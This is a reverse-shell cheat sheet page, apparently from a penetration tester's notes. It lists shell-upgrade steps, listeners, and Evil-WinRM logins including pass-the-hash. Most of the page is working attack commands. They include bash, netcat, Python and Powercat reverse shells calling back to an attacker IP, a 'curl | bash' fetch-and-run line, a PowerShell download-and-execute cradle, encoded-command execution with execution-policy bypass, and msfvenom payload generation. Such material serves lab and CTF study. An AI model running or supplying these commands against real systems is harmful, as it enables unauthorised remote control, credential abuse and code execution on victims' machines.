Reverse Shells

Below we find reverse shells in different languages and different tools.

Upgrade Shell

Below you have a step by step how to upgrade your shell

Spawn a interactive shell with python
Send shell into the background (CTRL-Z)
Set the TTY.

Below you can see the command needed to execute to upgrade a shell.

1.Spawn Interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash");'

2. Send the shell to the background

CTRL-Z

3. Set the TTY

stty -a

stty raw -echo; fg

stty rows 66 cols 157

export TERM=xterm

After all the above steps we should have an more stable reverse shell.

Break out of restricted environment

echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

We find above one-liner on GTFOBins but we need the at-Binary for it to work.

Listeners

nc

rlwrap nc -lvnp 9001

msfconsole

msfconsole -q -r handler.res

# handler.res
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/shell_reverse_tcp
set ExitOnSession false
exploit -j

We will need to change the payload if we create a shell with an other payload.

Bash

bash -i >& /dev/tcp/10.10.14.161/9001 0>&1

curl http://10.10.14.161/shell.sh | bash

echo -n "bash  -i >& /dev/tcp/10.10.14.161/9001   0>&1" | base64 -w0

echo <b64string> | base64 -d | bash

shell.sh

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.161/9001 0>&1"

nc

nc 10.10.14.161 9001 -c bash

nc 10.10.14.161 9001 -e bash

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 10.10.14.161 9001 > /tmp/f

Evil-WinRM

evil-winrm -i 10.10.10.100 -u cub3 -p password

evil-winrm -i 10.10.10.100 -u cub3 -H hash

Certificate Authentication

openssl pkcs12 -in file.pfx -nocerts -nodes -out key.pem

openssl pkcs12 -in file.pfx -nokeys -out key.crt

evil-winrm -S -i 10.10.10.100 -c key.crt -k key.pem

PowerShell

echo "ping 10.10.14.161" | iconv 0t utf-16le | base64 -w 0

powershell -ep bypass -enc <encodedCommand>

Powercat

IEX (New-Object System.Net.Webclient).DownloadString("http://10.10.14.161/powercat.ps1");powercat -c 10.10.14.161 -p 443 -e powershell

Python

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.161",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=9001 -f exe > sh.exe

PreviousShells NextWeb Shells

Last updated 1 year ago

hashtagUpgrade Shell

hashtag1.Spawn Interactive shell

hashtag2. Send the shell to the background

hashtag3. Set the TTY

hashtagBreak out of restricted environment

hashtagListeners

hashtagnc

hashtagmsfconsole

hashtagBash

hashtagshell.sh